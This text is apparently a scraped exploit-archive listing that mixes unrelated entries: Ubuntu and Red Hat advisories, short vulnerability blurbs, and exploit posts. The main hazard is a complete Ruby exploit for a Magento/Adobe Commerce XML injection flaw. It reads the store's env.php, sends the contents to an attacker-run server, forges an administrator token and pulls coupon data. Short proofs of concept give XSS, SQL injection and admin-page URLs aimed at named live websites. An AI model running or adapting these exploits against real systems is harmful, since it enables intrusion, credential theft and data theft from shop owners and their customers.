Logwatch analyzes and reports on unix system logs. It is a customizable and pluggable log monitoring system which will go through the logs for a given period of time and make a customizable report. It should work right out of the package on most systems.

Logwatch 7.11

Collateral Damage is a kernel exploit for Xbox SystemOS using CVE-2024-30088. It targets Xbox One and Xbox Series consoles running kernel versions 25398.4478, 25398.4908, and 25398.4909. The initial entrypoint is via the Game Script UWP application.

Collateral Damage CVE-2024-30088 Privilege Escalation

Ubuntu Security Notice 6903-1 - Multiple security issues were discovered in Thunderbird. If a user were tricked into opening a specially crafted website in a browsing context, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information, bypass security restrictions, cross-site tracing, or execute arbitrary code. Ronald Crane discovered that Thunderbird did not properly manage certain memory operations in the NSS. An attacker could potentially exploit this issue to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6903-1July 22, 2024thunderbird vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Thunderbird.Software Description:- thunderbird: Mozilla Open Source mail and newsgroup clientDetails:Multiple security issues were discovered in Thunderbird. If a user weretricked into opening a specially crafted website in a browsing context, anattacker could potentially exploit these to cause a denial of service,obtain sensitive information, bypass security restrictions, cross-sitetracing, or execute arbitrary code. (CVE-2024-6600, CVE-2024-6601,CVE-2024-6604)Ronald Crane discovered that Thunderbird did not properly manage certainmemory operations in the NSS. An attacker could potentially exploit thisissue to cause a denial of service. (CVE-2024-6602)Irvan Kurniawan discovered that Thunderbird did not properly manage memoryduring thread creation. An attacker could potentially exploit thisissue to cause a denial of service, or execute arbitrary code. (CVE-2024-6603)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS  thunderbird                     1:115.13.0+build5-0ubuntu0.22.04.1Ubuntu 20.04 LTS  thunderbird                     1:115.13.0+build5-0ubuntu0.20.04.1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6903-1  CVE-2024-6600, CVE-2024-6601, CVE-2024-6602, CVE-2024-6603,  CVE-2024-6604Package Information:  https://launchpad.net/ubuntu/+source/thunderbird/1:115.13.0+build5-0ubuntu0.22.04.1  https://launchpad.net/ubuntu/+source/thunderbird/1:115.13.0+build5-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6903-1

Adobe Commerce and Magento Open Source are affected by an XML injection vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction. Versions Affected include Adobe Commerce and Magento Open Source 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8, and earlier. This exploit uses the arbitrary file reading aspect of the issue to impersonate a user.

#!/usr/bin/env ruby -W0

require 'bundler'  
Bundler.require(:default)

DEBUG = false  
USE_PROXY = false  
PROXY_ADDR = '127.0.0.1'  
PROXY_PORT = 8080

def debug(msg)  
  puts msg.inspect if DEBUG  
end

def rand_text(length = 8)  
  # random string generator  
  o = [('a'..'z'), ('A'..'Z')].map(&:to_a).flatten  
  (0...length).map { o[rand(o.length)] }.join  
end

def dtd_param_name  
  @dtd_param_name ||= rand_text()  
end

def ent_eval  
  @ent_eval ||= rand_text()  
end

def leak_param_name  
  @leak_param_name ||= rand_text()  
end

def remote_addr  
  @remote_addr ||= "http://#{@srv_host.host}:#{@srv_host.port}"  
end

def http  
  @http ||= begin  
    http = if USE_PROXY  
             Net::HTTP.new(@target_uri.host, @target_uri.port, PROXY_ADDR, PROXY_PORT)  
           else  
             Net::HTTP.new(@target_uri.host, @target_uri.port)  
           end

    if @target_uri.port == 443 || @target_uri.to_s.match(%r{http(s).*})  
      http.use_ssl = true  
      http.verify_mode = OpenSSL::SSL::VERIFY_NONE  
    end

    http.set_debug_output($stderr) if DEBUG  
    http  
  end  
end

def make_xxe_dtd  
  filter_path = 'php://filter/convert.base64-encode/resource=../app/etc/env.php'  
  ent_file = rand_text()  
  %(  
    <!ENTITY % #{ent_file} SYSTEM "#{filter_path}">  
    <!ENTITY % #{dtd_param_name} "<!ENTITY #{ent_eval} SYSTEM '#{remote_addr}/?#{leak_param_name}=%#{ent_file};'>">  
  )  
end

def xxe_xml_data()  
  param_entity_name = rand_text()

  xml = "<?xml version='1.0' ?>"  
  xml += "<!DOCTYPE #{rand_text()}"  
  xml += '['  
  xml += "  <!ELEMENT #{rand_text()} ANY >"  
  xml += "    <!ENTITY % #{param_entity_name} SYSTEM '#{remote_addr}/#{rand_text}.dtd'> %#{param_entity_name}; %#{dtd_param_name}; "  
  xml += ']'  
  xml += "> <r>&#{ent_eval};</r>"

  xml  
end

LIBXML_NOENT = 2  
LIBXML_PARSEHUGE = 524288

def xxe_request()  
  debug('Sending XXE request')

  signature = rand_text().capitalize

  post_data = {  
    "address": {  
      "#{signature}": rand_text(),  
      "totalsCollector": {  
        "collectorList": {  
          "totalCollector": {  
            "\u0073\u006F\u0075\u0072\u0063\u0065\u0044\u0061\u0074\u0061": {  
              "data": xxe_xml_data(),  
              "options": LIBXML_NOENT|LIBXML_PARSEHUGE  
            }  
          }  
        }  
      }  
    }  
  }.to_json  
  req = Net::HTTP::Post.new('/rest/V1/guest-carts/1/estimate-shipping-methods')  
  req.body = post_data  
  req.content_type = 'application/json'  
  # req.user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)'  
  res = http.request(req)

  raise RuntimeError, "Server returned unexpected response" unless res&.code == '400'

  body = JSON.parse(res.body)

  raise RuntimeError, "Server returned unexpected response" unless body['parameters']['fieldName'] == signature

end

TARGET_USER_ID = 1

USER_TYPE_INTEGRATION = 1;  
USER_TYPE_ADMIN = 2;  
USER_TYPE_CUSTOMER = 3;  
USER_TYPE_GUEST = 4;

def jwt_encode(key, algorithm = 'HS256')  
  def pad_key(key, total_length, pad_char)  
    left_padding = (total_length - key.length) / 2  
    right_padding = total_length - key.length - left_padding  
    pad_char * left_padding + key + pad_char * right_padding  
  end  
  header = {  
    kid: "1",  
    alg: "HS256"  
  }

  payload = {  
    uid: TARGET_USER_ID,    
    utypid: USER_TYPE_ADMIN,  
    iat: Time.now.to_i,  # Token issue time',  
    exp: Time.now.to_i + 10 * 24 * 60 * 60,  # Token expiration time  
  }

  def base64_url_encode(str)  
    Base64.urlsafe_encode64(str).tr('=', '')  
  end

  padded_key = pad_key(key, 2048, '&')

  encoded_header = base64_url_encode(header.to_json)  
  encoded_payload = base64_url_encode(payload.to_json)

  # Create the signature  
  data = "#{encoded_header}.#{encoded_payload}"  
  signature = OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha256'), padded_key, data)  
  encoded_signature = base64_url_encode(signature)

  # Combine the header, payload, and signature to form the JWT  
  "#{encoded_header}.#{encoded_payload}.#{encoded_signature}"

end

def exploit()  
  begin  
    puts "Starting web server..."  
    body = make_xxe_dtd()  
    file_content = nil  
    file_content_reader, file_content_writer = IO.pipe  
    WEBrick::HTTPRequest.const_set("MAX_URI_LENGTH", 10240)  
    wbserver_options = {  
      :BindAddress => '0.0.0.0',  
      :Port => @srv_host.port,  
      :Logger => WEBrick::Log.new($stderr, WEBrick::Log::DEBUG),  
      :AccessLog => [],  
      # :RequestTimeout => 300,       # Increase request timeout  
      # :RequestMaxUriLength => 100240 # Increase max URI length  
    }  
    wbserver_options[:Logger] = WEBrick::Log.new("/dev/null") unless DEBUG

    pid = Process.fork do  
      file_content_reader.close

      server = WEBrick::HTTPServer.new(wbserver_options)  
      server.mount_proc '/' do |req, res|  
        if req.path =~ /\.dtd$/  
          res.body = body  
        elsif req.query_string.match(/#{leak_param_name}=(.*)/)  
          file_content = Base64.decode64(Regexp.last_match(1))  
          # puts "Received leaked file content:\n#{file_content}"  
          file_content_writer.puts file_content

        else  
          res.body = 'OK'  
        end  
      end

      trap("INT") do  
        server.shutdown  
        file_content_writer.close  
      end

      server.start  
    end

    sleep(1)  
    xxe_request()  
    file_content_writer.close

    begin  
      # Set a timeout for reading from the pipe  
      Timeout.timeout(5) do  # 5 seconds timeout, adjust as necessary  
        file_content = file_content_reader.read_nonblock(10000)  # Adjust the size as necessary  
      end  
    rescue Timeout::Error  
      puts "Reading from pipe timed out."  
    rescue EOFError  
      puts "End of file reached."  
    ensure  
      file_content_reader.close  
    end

    # Use file_content as needed here  
    if file_content  
      # puts "Successfully read file content:\n#{file_content}"  
      key = file_content.match(/'key' => '(.*)'/)[1]  
      if key  
        debug "Found key: #{key}"  
        jwt = jwt_encode(key)  
        puts "Generated JWT: #{jwt}"  
        puts("Sending request with JWT to coupons endpoint")  
        # Perform authenticated request to a admin endpoint  
        res = http.request(Net::HTTP::Get.new('/rest/default/V1/coupons/search?searchCriteria=', {'Authorization' => "Bearer #{jwt}"}))  
        raise RuntimeError, "Server returned unexpected response" unless res&.code == '200'  
        puts "Available coupons:"  
        puts JSON.pretty_generate(JSON.parse(res.body))  
      else  
        puts "Failed to extract key from file content."  
      end  
    else  
      puts "Failed to read file content or content is empty."  
    end

    puts "Exploit completed"

  rescue RuntimeError => e  
    puts "#{e.class} - #{e.message}"  
  ensure  
    if pid  
      Process.kill("INT", pid)  
      Process.wait(pid)  
    end  
  end  
end

if __FILE__ == $0  
  @target_uri = URI.parse(ARGV[0])  
  @srv_host = URI.parse(ARGV[1])

  exploit()  
end

Adobe Commerce / Magento Open Source XML Injection / User Impersonation

Xhibiter NFT Marketplace version 1.10.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Xhibiter NFT Marketplace 1.10.2 XSS Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://elements.envato.com/xhibiter-nft-marketplace-html-template-AQN45FA                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /search.php?id=1'%22()%26%25<acx><ScRiPt%20>prompt(915136)</ScRiPt>[+] https://www/127.0.0.1/gatesea.io/search.php?id=1'"()%26%25<acx><ScRiPt >prompt(915136)</ScRiPt>Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Xhibiter NFT Marketplace 1.10.2 Cross Site Scripting

eStore CMS version 2.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : eStore CMS v2.0 Sql injection Vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : http://www.2iraq.com/                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : "CMS.php?CMS_P=" or "News_Details.php?ID="<===== inject here[+] https://www/127.0.0.1/uruk.edu.iq/News_Details.php?ID=467Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

eStore CMS 2.0 SQL Injection

Clenix version 1.0 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : Clenix v1.0 IDOR Vulnerability                                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.1 (64 bits)                                                   || # Vendor    : https://www.radiustheme.com/                                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /admin/main.php[+] https://www/127.0.0.1/otabucert.co.uk/admin/main.php[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Clenix 1.0 Insecure Direct Object Reference

Candy Redis version 2.1.2 appears to suffer from an administrative page disclosure issue.

====================================================================================================================================  
| # Title     : Candy Redis V2.1.2 HTML Form in redirect page Vulnerability                                                        |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   |  
| # Vendor    : https://bacadigital.com/pasti-bisa-panduan-ujian-cbt-untuk-pengguna/                                               |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Vulnerability description :

An HTML form was found in the response body of this page. However, the current page redirects the visitor to another page by returning an HTTP status code of 301/302.  
 Therefore, all browser users will not see the contents of this page and will not be able to interact with the HTML form. 

Sometimes programmers don't properly terminate the script after redirecting the user to another page. For example:   
<?php  
    if (!isset($_SESSION["authenticated"])) {  
        header("Location: auth.php");  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    
This script is incorrect because the script is not terminated after the "header("Location: auth.php");" line. An attacker can access the content the administration page by using an HTTP client that doesn't follow redirection (like HTTP Editor). This creates an authentication bypass vulnerability.   
The correct code would be 

<?php  
    if (!isset($_SESSION[auth])) {  
        header("Location: auth.php");  
        exit();  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    

[+] infected item : /pass. 

[+] Attack details :

Form action=''

GET /pass/ HTTP/1.1  
Pragma: no-cache  
Cache-Control: no-cache  
Referer: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/pass  
Acunetix-Aspect: enabled  
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c  
Acunetix-Aspect-Queries: filelist;aspectalerts  
Cookie: PHPSESSID=dc1a2974e1afffa5b1926d0e4f3ff57f  
Host: elearning7.smpn49-jkt.sch.id  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*

Response  
HTTP/1.1 302 Found  
Connection: Keep-Alive  
Keep-Alive: timeout=5, max=100  
x-powered-by: PHP/7.3.33  
location: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/login.php  
content-type: text/html; charset=UTF-8  
content-length: 16992  
vary: Accept-Encoding,User-Agent  
date: Fri, 19 Jul 2024 10:09:49 GMT  
server: LiteSpeed  
cache-control: no-cache, no-store, must-revalidate, max-age=0  
platform: hostinger  
strict-transport-security: max-age=31536000; includeSubDomains; preload  
x-xss-protection: 1; mode=block  
x-content-type-options: nosniff  
Original-Content-Encoding: gzip

[+] The impact of this vulnerability : depends on the affected web application.

[+] How to fix this vulnerability : Make sure the script is terminated after redirecting the user to another page

Greetings to :==================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |  
================================================================

Candy Redis 2.1.2 Admin Page Disclosure

Agop CMS version 1.0 suffers from an insecure direct object reference vulnerability.

**Agop CMS 1.0 Insecure Direct Object Reference**

Posted Jul 22, 2024

Authored by indoushka

Agop CMS version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 1ed22de09e417dcaed8d9f03d8d62abd6b70fc4587552e70a4bdbce253d3011b

Download | Favorite | View

**Agop CMS 1.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : Agop CMS v1.0 IDOR Vulnerability                                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : http://gico.io/agop/demos/                                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /admin/managePages.php[+] https://www/127.0.0.1/tiktrades.com/admin/managePages.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,061)
*   Arbitrary (16,823)
*   BBS (2,859)
*   Bypass (1,852)
*   CGI (1,033)
*   Code Execution (7,776)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,985)
*   Encryption (2,389)
*   Exploit (53,050)
*   File Inclusion (4,256)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,875)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,161)
*   Local (14,770)
*   Magazine (586)
*   Overflow (13,147)
*   Perl (1,435)
*   PHP (5,219)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,629)
*   Remote (31,602)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,021)
*   Shell (3,270)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,584)
*   TCP (2,439)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,893)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,234)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (376)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,531)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,456)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,351)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,673)
*   UNIX (9,429)
*   UnixWare (187)
*   Windows (6,667)
*   Other

Agop CMS 1.0 Insecure Direct Object Reference

Red Hat Security Advisory 2024-4673-03 - An update for firefox is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4673.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: firefox security updateAdvisory ID:        RHSA-2024:4673-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4673Issue date:         2024-07-22Revision:           03CVE Names:          CVE-2024-6601====================================================================Summary: An update for firefox is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.Security Fix(es):* Mozilla: Memory safety bugs fixed in Firefox 128, Firefox ESR 115.13, and Thunderbird 115.13 (CVE-2024-6604)* Mozilla: Race condition in permission assignment (CVE-2024-6601)* Mozilla: Memory corruption in thread creation (CVE-2024-6603)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6601References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2296636https://bugzilla.redhat.com/show_bug.cgi?id=2296638https://bugzilla.redhat.com/show_bug.cgi?id=2296639